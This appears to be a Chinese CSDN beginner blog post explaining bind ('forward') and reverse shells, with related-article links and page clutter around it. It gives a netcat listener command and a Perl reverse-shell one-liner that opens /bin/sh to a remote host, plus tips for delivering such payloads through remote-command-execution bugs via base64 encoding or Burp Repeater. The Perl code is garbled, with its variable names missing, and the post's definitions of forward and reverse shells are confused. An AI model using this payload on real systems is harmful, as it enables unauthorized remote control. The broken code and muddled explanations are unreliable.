shell介绍

最新推荐文章于 2024-10-11 20:52:27 发布
最新推荐文章于 2024-10-11 20:52:27 发布
阅读量327 收藏 3
点赞数 7
文章标签: linux 运维 服务器
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_72324806/article/details/141904396
版权

[基础入门]正向shell和反弹shell-CSDN博客

shell:执行用户命令的接口,通过这个接口实现对计算机的控制

反弹shell:一台主机控制另一台

  1. 正向shell:在攻击机上开启一个监听端口,让被攻击机主动连接攻击机,成功后,攻击机就能控制被攻击机——被攻击机被动攻击是正向的,主动被攻击是反弹shell
  2. 反弹shell:被攻击的机子是内网或者设置了防火墙,攻击机无法连接,但是被攻击机可以连接攻击机,从而被攻击

反弹shell可以用在远程命令执行RCE漏洞上

被攻击机主动连出来:棱角社区

IP选择攻击机的IP,监听端口5566(linux服务器:nc -lvnp 5566),生成的反弹shell语句,让被攻击机执行:远程命令执行或任意命令执行(上文有具体介绍

如果没弹过来:

  1. 可以多复制多执行
  2. 可能无法解析,经过base64编码之后
  3. 或者bp抓包,放到repeater,改成post,echo;[perl语句]:大概率可以实现
perl -e 'use Socket;="127.0.0.1";=8080;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in(,inet_aton()))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

然后就会连接到被攻击机,得到他的权限

搜索该漏洞的影响版本,按照wp复现,但是不要真打,容易进去

Nosery
关注
Jmeter Bean shell 介绍
04-24
**Jmeter Bean Shell 介绍** 在性能测试领域,Apache JMeter 是一款广泛使用的开源工具,它支持多种测试组件,其包括 Bean Shell。Bean Shell 是 JMeter 的一个重要元素,它允许测试人员通过脚本语言的方式执行...
linux shell介绍
07-16
自己参照各种资料,结合开发实际遇到的问题,整理而成。欢迎下载使用
Unix Shell介绍
11-13
Unix Shell是Unix操作系统最核心的组件之一,它既是命令行解释器,也是用户与系统交互的界面。在学习Unix Shell之前,我们首先要理解其基本概念。Shell作为一个接口,允许用户通过输入指令来控制操作系统,执行...
shell介绍ppt
03-29
Shell是UNIX和Linux操作系统的命令解释器,它作为用户与操作系统之间的一个接口,接收用户的输入命令并执行相应的程序。shell不仅是一个简单的命令行界面,它还具有强大的编程能力,允许用户编写复杂的脚本来自动...
Linux 命令:每日一学,参数传递之xargs命令实践
WeiyiGeek 唯一极客IT知识分享
10-11 557
描述:上一章,我们学习了Linux查找搜寻文件或目录的相关命令,此章我们学习常常与find命令联合使用,以及在Shell脚本常用的参数替换 xargs 命令进行实践学习,从而实现更加强大的参数传递和多进程并行执行Linux命令或脚本等Linux 命令:每日一学,参数传递之xargs命令实践此Linux 命令 | 系列文章将作为《#运维从业必学。
【2024版】最新kali linux入门及常用简单工具介绍(非常详细)零基础入门到精通,收藏这一篇就够了_kalilinux
weixin_57514792的博客
10-07 1211
最新kali linux入门及常用简单工具介绍
Linux从小白到高手》综合应用篇:详解Linux系统调优之内存优化
最新发布
qq_45732829的博客
10-11 492
内存是影响Linux性能的主要因素之一,内存资源的充足与否直接影响应用系统的使用性能。内存调优的主要目标是合理分配和利用内存资源,减少内存浪费,提高内存利用率,从而提升系统整体性能。
linux之curl
qq_41081716的博客
10-06 419
发送指定的数据作为POST请求的主体。数据可以是键值对的形式。: 添加自定义HTTP头部。可以多次使用以添加多个头部。: 用于发送表单数据,特别是文件上传。: 指定请求方法,例如。
Linux 清理缓存
luoye_369的博客
10-11 108
一、问题描述log:
LeetCode题练习与总结:二叉树的序列化与反序列化--297
一直学习永不止步
10-11 786
本文详细介绍了二叉树序列化与反序列化的实现方法,包括前序遍历序列化、队列辅助反序列化等,分析了时间复杂度和空间复杂度,并总结了涉及的重要知识点,为二叉树处理提供了实用的解决方案。
VirtualBox Ubuntu22.04 NOI linux2.0 Terminal无法打开 终端打不开 两步解决法儿
10-07 294
CTRL + ALT + F3 进入命令行模式(需要返回桌面时CTRL + ALT + F1)把文件的 “en_US” 改成 “en_US.UTF-8”也可以 vim /etc/default/locale。reboot 重启虚拟机。
「字符串」Z函数(扩展KMP|exKMP)/ LeetCode 2223(C++)
dakingffo的博客
10-10 800
Z函数是一种独到的匹配算法,虽然国内称之为扩展KMP,其实他更具有Manacher算法的特征。与KMP类似的是,它也是字符串自匹配问题。
Linux】段错误(核心已转储)
冰恋云的专栏
10-11 29
刚做的新系统,1、内存还没用了 2.磁盘空间也肯没问题,刚做的,啥也没安装了。3.文件系统直接都好好的,就安装了软件,系统文件就能坏了?4.查看selinux,selinux也没问题 配置文件。5.那就是二进制文件损坏?查看slinux getenforce。直接查看 getenforce。命令的二进制文件可能损坏或不完整。安装完再添加用户就好了。
Brave编译指南2024 Linux篇-准备工作(三)
守城小轩的技术窝棚
10-11 149
本文详细列出了编译Brave浏览器所需的系统要求和推荐工具。确保您的系统满足这些要求,并安装了推荐的工具,将有助于后续的编译过程更加顺利。接下来,我们将开始获取Brave的源代码,为编译做最后的准备。
Linux服务与安全管理》| 服务进程与网络配置
YueXuan_521的博客
10-11 655
本文是《Linux服务与安全管理》课程的任务单,主要涵盖Linux服务进程管理与网络基础配置的学习目标与实践操作。任务包括掌握服务、进程管理以及网络配置的基本操作,如查看服务状态、配置定时任务、管理进程以及配置网络IP等。通过实践,学生需熟悉Linux环境下各项管理操作,树立职业观念并培养自主学习与团队协作能力。任务完成后,学生将能熟练运用Linux进行系统管理与网络配置。
Linux:进程间通信之信号量
Au_ust的博客
10-03 1006
system V的进程间通信除了共享内存,还有消息队列和信号量IPC(进程间通信的简称)
linuxC高级_day4
weixin_63791423的博客
10-05 960
分文件编程/gcc 编译工具/gdb调试工具/make工具/makefile格式/用make管理多个文件/makefile变量/make指令
Linux Shell 编程:特殊变量和 Shell 介绍
Linux Shell 的特殊变量 Linux Shell 的特殊变量是指一些预定义的变量,它们可以在 Shell 脚本使用,以获取某些信息或执行某些操作。这些特殊变量可以分为两类:位置参数和其他特殊变量。 **位置参数** ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Nosery

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值